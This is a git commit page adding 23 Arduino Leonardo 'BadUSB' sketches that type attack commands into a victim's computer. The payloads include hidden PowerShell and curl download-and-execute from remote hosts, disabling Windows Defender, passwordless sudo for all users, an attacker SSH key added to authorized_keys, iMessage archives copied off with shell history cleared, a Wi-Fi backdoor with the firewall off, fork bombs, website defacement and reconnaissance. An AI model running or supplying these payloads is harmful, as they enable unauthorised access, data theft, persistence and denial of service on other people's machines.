adil
/
badusb_examples
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

+scripts

This commit is contained in:
Joel Serna Moreno 2018-05-22 00:24:27 +02:00 committed by GitHub
parent 46f3280cd4
commit 75439f7266
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
23 changed files with 540 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
atmega32u4_arduino_leonardo/anti_browser/anti_browser.ino Normal file
View File

@ -0,0 +1,37 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("cmd");
delay(3000);
Keyboard.println("cd %userprofile%/Downloads");
delay(2000);
Keyboard.println("copy con CW.vbs");
delay(2000);
Keyboard.println("do");
delay(2000);
Keyboard.println("Set objShell = CreateObject(\"WScript.Shell\")");
delay(2000);
Keyboard.println("WScript.Sleep 800");
delay(2000);
Keyboard.println("objShell.SendKeys \"^{W}\"");
delay(2000);
Keyboard.println("loop");
delay(2000);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('z');
delay(100);
Keyboard.releaseAll();
delay(3000);
Keyboard.press(KEY_RETURN);
delay(100);
Keyboard.releaseAll();
delay(2000);
Keyboard.println("start CW.vbs && exit");
while(1);
}

19
atmega32u4_arduino_leonardo/basic_terminal_commands_ubuntu/basic_terminal_commands_ubuntu.ino Normal file
View File

@ -0,0 +1,19 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarGnome("gnome-terminal");
delay(3000);
Keyboard.println("pwd");
delay(2000);
Keyboard.println("id");
delay(2000);
Keyboard.println("cat /etc/passwd");
delay(2000);
while(1);
}

18
atmega32u4_arduino_leonardo/download_file_and_run_windows/download_file_and_run_windows.ino Normal file
View File

@ -0,0 +1,18 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("powershell");
delay(3000);
Keyboard.println("powershell Import-Module BitsTransfer;");
delay(3000);
Keyboard.println("Start-BitsTransfer -Source \"http://server/file.exe\" -Destination \"%TEMP%\\file.exe\";");
delay(3000);
Keyboard.println("Start-Process \"%TEMP%\\fichero.exe\"");
while(1);
}

18
atmega32u4_arduino_leonardo/example_hc0n/example_hc0n.ino Normal file
View File

@ -0,0 +1,18 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX (New-Object System.Net.WebClient).DownloadFile('[url_pastebin]',\\\"$env:userprofile\\Desktop\\hc0n.bat\\\")");
delay(15000);
CommandAtRunBarMSWIN("cmd");
delay(4000);
Keyboard.println("cd %USERPROFILE%\\Desktop");
delay(3000);
Keyboard.println("hc0n.bat");
while(1);
}

1
atmega32u4_arduino_leonardo/example_hc0n/readme.md Normal file
View File

@ -0,0 +1 @@
Script used for H-c0n Conference

12
atmega32u4_arduino_leonardo/fake_update_screen/fake_update_screen.ino Normal file
View File

@ -0,0 +1,12 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("iexplore -k http://fakeupdate.net/win10u/index.html");
while(1);
}

18
atmega32u4_arduino_leonardo/fork_bomb/fork_bomb.ino Normal file
View File

@ -0,0 +1,18 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("cmd");
delay(3000);
Keyboard.println("MODE CON: COLS=15 LINES=1");
delay(2000);
Keyboard.println("COLOR EF");
delay(2000);
Keyboard.println("for /l %x in (1,1,10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000) do start");
while(1);
}

91
atmega32u4_arduino_leonardo/information_gathering_ubuntu/information_gathering_ubuntu.ino Normal file
View File

@ -0,0 +1,91 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarGnome("gnome-terminal");
delay(3000);
Keyboard.println("echo \"Logged in user: \" $USER > info_gathering.txt");
delay(2000);
Keyboard.println("echo >> info_gathering.txt");
delay(2000);
Keyboard.println("echo -n \"Distribution Kernel Version: \" >> info_gathering.txt");
delay(2000);
Keyboard.println("cat /etc/issue | cut -c1-13 >> info_gathering.txt");
delay(2000);
Keyboard.println("echo -n \"uname results: \" >> info_gathering.txt");
delay(2000);
Keyboard.println("uname -a >> info_gathering.txt");
delay(2000);
Keyboard.println("echo >> info_gathering.txt");
delay(2000);
Keyboard.println("echo \"Shellsock Bug Vulnerability: \" >> info_gathering.txt");
delay(2000);
Keyboard.println("env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\" >> info_gathering.txt");
delay(2000);
Keyboard.println("echo >> info_gathering.txt");
delay(2000);
Keyboard.println("echo >> info_gathering.txt");
delay(2000);
Keyboard.println("echo \"Mounted filesystems: \" >> info_gathering.txt");
delay(2000);
Keyboard.println("mount -l >> info_gathering.txt");
delay(2000);
Keyboard.println("echo >> info_gathering.txt");
delay(3000);
Keyboard.println("echo \"Network Configuration: \" >> info_gathering.txt");
delay(2000);
Keyboard.println("ifconfig -a | grep 'Link\\|inet' >> info_gathering.txt");
delay(2000);
Keyboard.println("echo >> info_gathering.txt");
delay(2000);
Keyboard.println("echo \"Print Hosts: \" >> info_gathering.txt");
delay(2000);
Keyboard.println("cat /etc/hosts >> info_gathering.txt");
delay(2000);
Keyboard.println("echo \"Print ARP: \" >> info_gathering.txt");
delay(2000);
Keyboard.println("arp >> info_gathering.txt");
delay(2000);
Keyboard.println("echo >> info_gathering.txt");
delay(3000);
Keyboard.println("echo \"Development tools availability: \" >> info_gathering.txt");
delay(2000);
Keyboard.println("which gcc >> info_gathering.txt");
delay(2000);
Keyboard.println("which g++ >> info_gathering.txt");
delay(2000);
Keyboard.println("which python >> info_gathering.txt");
delay(2000);
Keyboard.println("echo >> info_gathering.txt");
delay(2000);
Keyboard.println("echo \"Print TCP/UDP Listening Services: \" >> info_gathering.txt");
delay(2000);
Keyboard.println("netstat -tunlpe >> info_gathering.txt");
delay(2000);
Keyboard.println("echo >> info_gathering.txt");
delay(2000);
Keyboard.println("echo \"Installed Packages: \" >> info_gathering.txt");
delay(2000);
Keyboard.println("dpkg -l >> info_gathering.txt");
delay(2000);
Keyboard.println("echo >> info_gathering.txt");
delay(2000);
Keyboard.println("echo \"Find Readable Folders in /etc: \" >> info_gathering.txt");
delay(2000);
Keyboard.println("find /etc -user $(id -u) -perm -u=r -o -group $(id -g) -perm -g=r -o -perm -o=r -ls 2> /dev/null >> info_gathering.txt");
delay(2000);
Keyboard.println("echo >> info_gathering.txt");
delay(2000);
Keyboard.println("echo \"Find SUID and GUID files\" >> info_gathering.txt");
delay(2000);
Keyboard.println("find / -type f -perm -u=s -o -type f -perm -g=s -ls 2> /dev/null >> info_gathering.txt");
delay(5000);
Keyboard.println("exit");
delay(2000);
while(1);
}

31
atmega32u4_arduino_leonardo/invisible_fork_bomb/invisible_fork_bomb.ino Normal file
View File

@ -0,0 +1,31 @@
#define kbd_es_es
#include <phukdlib_leonardo.h>
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("cmd");
delay(3000);
Keyboard.println("copy con forkb.vbs");
delay(2000);
Keyboard.println("do");
delay(2000);
Keyboard.println("CreateObject(\"Wscript.Shell\").Run \"cmd\", 0, False");
delay(2000);
Keyboard.println("loop");
delay(2000);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('z');
delay(100);
Keyboard.releaseAll();
delay(2000);
Keyboard.press(KEY_RETURN);
delay(100);
Keyboard.releaseAll();
delay(3000);
Keyboard.println("start forkb.vbs && exit");
while(1);
}

35
atmega32u4_arduino_leonardo/non_malicius_auto_defacer/non_malicius_auto_defacer.ino Normal file
View File

@ -0,0 +1,35 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarGnome("gnome-terminal");
delay(3000);
Keyboard.println("cd /var/www");
delay(2000);
Keyboard.println("mv index.* index.bak");
delay(2000);
Keyboard.println("touch index.html");
delay(2000);
Keyboard.println("nano index.html");
delay(2000);
Keyboard.println("<marquee><h1>You have been hacked by the BadUSB Leonardo</h1></marquee>");
delay(2000);
Keyboard.println("<center><a href=\"http://www.usbrubberducky.com/\"><img src=\"http://cdn.shopify.com/s/files/1/0068/2142/products/usbducky2.jpg\" /></a><center>");
delay(2000);
Keyboard.println("<center><h5>Your old index page can be found <a href=\"./index.bak\">here.</a></h5></center>");
delay(2000);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('x');
delay(100);
Keyboard.releaseAll();
delay(2000);
Keyboard.println("y");
delay(3000);
Keyboard.println("exit");
while(1);
}

29
atmega32u4_arduino_leonardo/osx_imessage_capture/osx_imessage_capture.ino Normal file
View File

@ -0,0 +1,29 @@
#define kbd_es_es
#include <phukdlib_leonardo.h>
void setup() {
Keyboard.begin();
}
void loop() {
CommandAtRunBarOSX("terminal");
delay(3000);
Keyboard.println("cp -r ~/Library/Messages/Archive /Volumes/RubberDucky/$USER/");
delay(3000);
Keyboard.println("history -c");
delay(3000);
Keyboard.println("diskutil umount /Volumes/RubberDucky");
delay(3000);
Keyboard.println("history -c");
delay(3000);
Keyboard.println("echo 5A13X99");
delay(3000);
Keyboard.println("exit");
delay(3000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('q');
delay(100);
Keyboard.releaseAll();
delay(3000);
while(1);
}

16
atmega32u4_arduino_leonardo/osx_passwordless_ssh_access_ssh_keys/osx_passwordless_ssh_access_ssh_keys.ino Normal file
View File

@ -0,0 +1,16 @@
#define kbd_es_es
#include <phukdlib_leonardo.h>
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarOSX("terminal");
delay(5000);
Keyboard.println("echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys");
delay(4000);
Keyboard.println("killall Terminal");
while(1);
}

20
atmega32u4_arduino_leonardo/osx_photo_booth_prank/osx_photo_booth_prank.ino Normal file
View File

@ -0,0 +1,20 @@
#define kbd_es_es
#include <phukdlib_leonardo.h>
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarOSX("photo booth");
delay(3000);
Keyboard.press(KEY_RETURN);
delay(100);
Keyboard.releaseAll();
delay(3000);
CommandAtRunBarOSX("terminal");
delay(3000);
Keyboard.println("say You look ugly!");
while(1);
}

15
atmega32u4_arduino_leonardo/osx_sudo_for_all_users_without_password/osx_sudo_for_all_users_without_password.ino Normal file
View File

@ -0,0 +1,15 @@
#define kbd_es_es
#include <phukdlib_leonardo.h>
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarOSX("terminal");
delay(3000);
Keyboard.println("mount -uw / && chmod 755 /etc/sudoers && echo 'ALL ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers && chmod 440 /etc/sudoers && shutdown -h now");
delay(3000);
while(1);
}

16
atmega32u4_arduino_leonardo/osx_wget_and_execute/osx_wget_and_execute.ino Normal file
View File

@ -0,0 +1,16 @@
#define kbd_es_es
#include <phukdlib_leonardo.h>
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarOSX("terminal");
delay(3000);
Keyboard.println("curl http://SERVER/path/to/file > file");
delay(2000);
Keyboard.println("INSERT COMMAND TO EXECUTE HERE");
while(1);
}

15
atmega32u4_arduino_leonardo/osx_youtube_blaster/osx_youtube_blaster.ino Normal file
View File

@ -0,0 +1,15 @@
#define kbd_es_es
#include <phukdlib_leonardo.h>
void setup() {
Keyboard.begin();
}
void loop() {
CommandAtRunBarOSX("terminal");
delay(3000);
Keyboard.println("osascript -e 'set volume 7'");
delay(2000);
Keyboard.println("open https://www.youtube.com/watch?v=dQw4w9WgXcQ");
while(1);
}

13
atmega32u4_arduino_leonardo/powershell_wget_execute/powershell_wget_execute.ino Normal file
View File

@ -0,0 +1,13 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\\\"$env:temp\\bob.exe\\\"); Start-Process \\\"$env:temp\\bob.exe\\\"\"");
delay(3000);
while(1);
}

18
atmega32u4_arduino_leonardo/powershell_wget_execute_update/powershell_wget_execute_update.ino Normal file
View File

@ -0,0 +1,18 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("powershell -windowstyle hidden");
delay(3000);
Keyboard.println("$source = \"File URL \"; $destination = \"Path\\FileName\"; Invoke-WebRequest $source -OutFile $destination;");
delay(2000);
Keyboard.println("start-process FileName.EXE");
delay(2000);
Keyboard.println("exit");
while(1);
}

26
atmega32u4_arduino_leonardo/powershell_wget_execute_update_with_jar/powershell_wget_execute_update_with_jar.ino Normal file
View File

@ -0,0 +1,26 @@
#define kbd_es_es
#include <phukdlib_leonardo.h>
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("powershell -windowstyle hidden");
delay(4000);
Keyboard.press(KEY_LEFT_ARROW);
delay(200);
Keyboard.releaseAll();
delay(2000);
Keyboard.press(KEY_RETURN);
delay(200);
Keyboard.releaseAll();
delay(5000);
Keyboard.println("$source = \"File URL \"; $destination = \"Path\\FileName\"; Invoke-WebRequest $source -OutFile $destination;");
delay(2000);
Keyboard.println("start-process FileName.jar");
delay(2000);
Keyboard.println("exit");
while(1);
}

20
atmega32u4_arduino_leonardo/talker/talker.ino Normal file
View File

@ -0,0 +1,20 @@
#define kbd_es_es
#include <phukdlib_leonardo.h>
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("powershell");
delay(4000);
Keyboard.println("Add-Type -AssemblyName System.speech");
delay(2000);
Keyboard.println("$speak = New-Object System.Speech.Synthesis.SpeechSynthesizer");
delay(2000);
Keyboard.println("$speak.Speak(\"Esto es una prueba\")");
delay(2000);
Keyboard.println("exit");
while(1);
}

24
atmega32u4_arduino_leonardo/win10_disable_windows_through_powershell/win10_disable_windows_through_powershell.ino Normal file
View File

@ -0,0 +1,24 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("powershell Start-Process powershell -Verb runAs");
delay(5000);
Keyboard.press(KEY_LEFT_ARROW);
delay(100);
Keyboard.releaseAll();
delay(2000);
Keyboard.press(KEY_RETURN);
delay(100);
Keyboard.releaseAll();
delay(5000);
Keyboard.println("Set-MpPreference -DisableRealtimeMonitoring $true");
delay(5000);
Keyboard.println("exit");
while(1);
}

27
atmega32u4_arduino_leonardo/win10_execute_powershell_script/win10_execute_powershell_script.ino Normal file
View File

@ -0,0 +1,27 @@
#define kbd_es_es
#include <phukdlib_leonardo.h>
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("powershell");
delay(5000);
Keyboard.println("$client = new-object System.Net.WebClient");
delay(2000);
Keyboard.println("$client.DownloadFile(\"https://scriptURL\" , \"script.ps1\")");
delay(12000);
CommandAtRunBarMSWIN("powershell.exe -windowstyle hidden -File %USERPROFILE%\\script.ps1");
delay(5000);
Keyboard.press(KEY_LEFT_ARROW);
delay(100);
Keyboard.releaseAll();
delay(2000);
Keyboard.press(KEY_RETURN);
delay(100);
Keyboard.releaseAll();
delay(2000);
while(1);
}

21
atmega32u4_arduino_leonardo/win7_wifi_backdoor/win7_wifi_backdoor.ino Normal file
View File

@ -0,0 +1,21 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("cmd");
delay(3000);
Keyboard.println("netsh wlan set hostednetwork mode=allow ssid=noobcake key=12345678");
delay(3000);
Keyboard.println("netsh wlan start hostednetwork");
delay(3000);
Keyboard.println("netsh advfirewall set currentprofile state off");
delay(3000);
Keyboard.println("exit");
delay(3000);
while(1);
}